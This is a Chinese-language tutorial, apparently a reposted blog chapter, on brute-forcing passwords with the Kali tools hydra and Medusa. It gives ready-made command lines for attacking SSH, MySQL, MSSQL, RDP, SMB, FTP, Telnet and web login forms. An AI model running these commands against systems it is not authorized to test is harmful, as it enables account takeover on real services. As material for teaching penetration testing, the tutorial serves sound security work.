滲透利器-kali工具 (第六章-2) 利用hydra暴力破解密碼


本文內容:

  • hydra簡介
  • hydra安裝配置
  • hrdra破解
  • Medusa

 

1,hydra簡介:

  hydra的中文意思是就透徹,它是一款爆破神器,可以對多種服務的賬號和密碼進行爆破,包括Web登錄、數據庫、SSH、Ftp等服務。

  支持Linux、Windows、Mac平台安裝,其中Kali Linux中自帶hydra。

  Hydra支持的服務有:POP3、SMB、RDP,SSH,FTP,POP3,Telnet,MYSQL……

  最大的安全漏洞之一是弱口令。

2,hydra安裝配置:

  Kali Linux中hydra自帶。

    Kali是安全從業人員常用的Linux系統,自帶有大量安全工具,hydra自然也繼承在里面。

    工具位置:密碼攻擊--在線攻擊一欄

    開源項目:https://github.com/vanhauser-thc/thc-hydra

  Windows中hydra安裝:

    hydra官方不支持Windows,需要在Github上下載,地址:https://github.com/maaaaz/thc-hydra-windows 下載解壓即可。

3,hydra破解:

  1.hydra相關參數:

    -l    LOGIN    指定破解的用戶名成,對特定用戶破解

    -L   FILE     從文件中加載用戶名進行破解。

    -p   PASS   小寫p執行密碼破解,少用,一般是采用密碼字典。

    -P   FILE     大寫字母P,指定密碼字典。

    -e          ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼[相同]試探。

    -C   FILE    使用冒號分隔格式,例如"登錄:密碼"來代替-L/-P參數。

    -t   TASKS  同時運行的鏈接的線程數,每一台主機默認為16

    -M   FILE   指定服務器目標列表文件一行一條。

    -w   TIME     設置最大超時的時間,單位秒,默認是30s。

    -O   FILE   指定結果輸出文件。

    -f          在使用-M參數以后,找到第一對登錄名或者密碼的時候終止破解。

    -v/-V       顯示詳細過程。

    -R        繼續從上一次進度接着破解。

    -S        采用SSL鏈接。

    -s   PORT   可通過這個參數指定非默認端口。

    -U        服務模塊使用細節

    -h              更多的命令行選項[完成的幫助]

    server       目標服務器名稱或者IP[使用這個或-M選項]

    service     指定服務名,支持的服務核協議telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

    OPT 一些服務模塊支持額外的輸入[-U用於模塊的幫助]

    例如:[用法]:   

      hydra -l user -P passlist.txt ftp://192.168.0.1
      hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
      hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      hydra -l admin -p password ftp://[192.168.0.0/24]/
      hydra -L logins.txt -P pws.txt -M targets.txt ssh

  2.hydra用法案例:

    圖形化界面:xhydra[推薦還是命令直接搞]

    案例1:

      破解Mysql密碼

      數據庫一般會提供一個默認的賬戶,sql server的sa與用戶,Mysql的root用戶,Oracle的System用戶等。

      假如我們現在破解Mysql數據庫:

        hydra -L user.txt -P pass.txt ip mysql

        hydra -L user.txt -P pass.txt mysql://目標ip:mysql端口號

      如果需要將爆破的過程打印出來就加個指令-v

        hydra -L username.txt -P password.txt -v 

        mysql://目標ip:mysql端口號

      成功后會打印類似如下的信息:

        [3306][mysql] host:ip  login:sa  password:sqladmin

    案例2:

      破解SSH:

        hydra -l 用戶名 -P 密碼字典 -t 線程 -v/V -e ns -f ip ssh

        hydra -l root -P /root/桌面/1.txt -t 6 -V -e ns -f 192.168.62.129 ssh

        hydra -l 用戶名 -P 密碼字典 -t 線程 -o save.log -vV -f ip ssh

      命令詳細:

        攻擊目標:192.168.62.128

        使用的模塊:ssh

        爆破用戶名:root (-1)

        使用的密碼字典:/root/passwd.txt (-P)

        爆破線程數:6 (-t)

        顯示詳細信息 (-V)

        爆破成功一個后提示(-f)

    其他案例:

      1.Windows密碼破解:

        hydra -l 用戶名 -p 密碼 smb://ip -vV<br>或者<br>hydra -l 用戶名 -p 密碼 smb ip –vV

      2.破解Ftp:

        hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程數(默認16) –vV

        如果你發現目標ftp並不是在21端口,而是在其他端口上,可以使用-s參數指定正確的端口,其他服務同樣如此

      3.破解rdp:

        hydra ip rdp -l administrator -P pass.txt –V

      4.破解telnet:

        hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f –V

      5.破解HTTPS:

        hydra -m /index.php -l muts -P pass.txt ip https

      6.Get方式提交,破解Web登錄[不推薦,太過雞肋]:

        hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /web/

      7.Post方式提交,破解Web登錄[不鬼劍,太過雞肋]:

        hydra -l 用戶名 -P 密碼字典  ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" -V 

  

  3.hydra的缺點:

    1.穩定性差,程序時常崩潰。

    2.速度控制不好,容易觸發服務器屏蔽或鎖死機制。

    3.每主機新建進程,沒服務新建實例。

    4.大量目標破解時性能差。

4,美杜莎-Medusa:

  1.Medusa的特點:

    1.穩定性好。

    2.速度控制得當。

    3.基於線程。

    4.支持模塊少於hydra[不支持rdp遠程桌面]

    5.Web-Form支持存在缺陷

  2.Medusa參數:    

    -h   [TEXT]          目標IP
    -H   [FILE]           目標主機文件
    -u   [TEXT]          用戶名
    -U   [FILE]           用戶名文件
    -p   [TEXT]          密碼
    -P   [FILE]           密碼文件
    -C   [FILE]           組合條目文件
    -O   [FILE]           文件日志信息[保存掃描結果]
    -e           [n/s/nsN意為空密碼,S意為密碼與用戶名相同
    -M   [TEXT]           模塊執行名稱
    -m   [TEXT]           傳遞參數到模塊
    -d                     顯示所有的模塊名稱
    -n   [NUM]             使用非默認端口
    -s                     啟用SSL
    -r   [NUM]           重試間隔時間,默認為3秒
    -t   [NUM]           設定線程數量
    -L                     並行化,每個用戶使用一個線程
    -f                      在任何主機上找到第一個賬號/密碼后,停止破解
    -q                       顯示模塊的使用信息
    -v   [NUM]          詳細級別(0-6)
    -w  [NUM]             錯誤調試級別(0-10)
    -V                    顯示版本
    -Z   [TEXT]            繼續掃描上一次

  3.Medusa使用:

    1.使用語法:

      medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

    2.破解MSSQL:

      medusa -h ip -u root -P /pass.txt -t 5 -f -M mssql

    3.破解ssh:

      medusa -M ssh -H host.txt -U user.txt -p password

    4.輸出日志文件:

      medusa -h ip -u sa -P /pass.txt -t 5 -f -e ns -M mssql -O /ap.txt


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM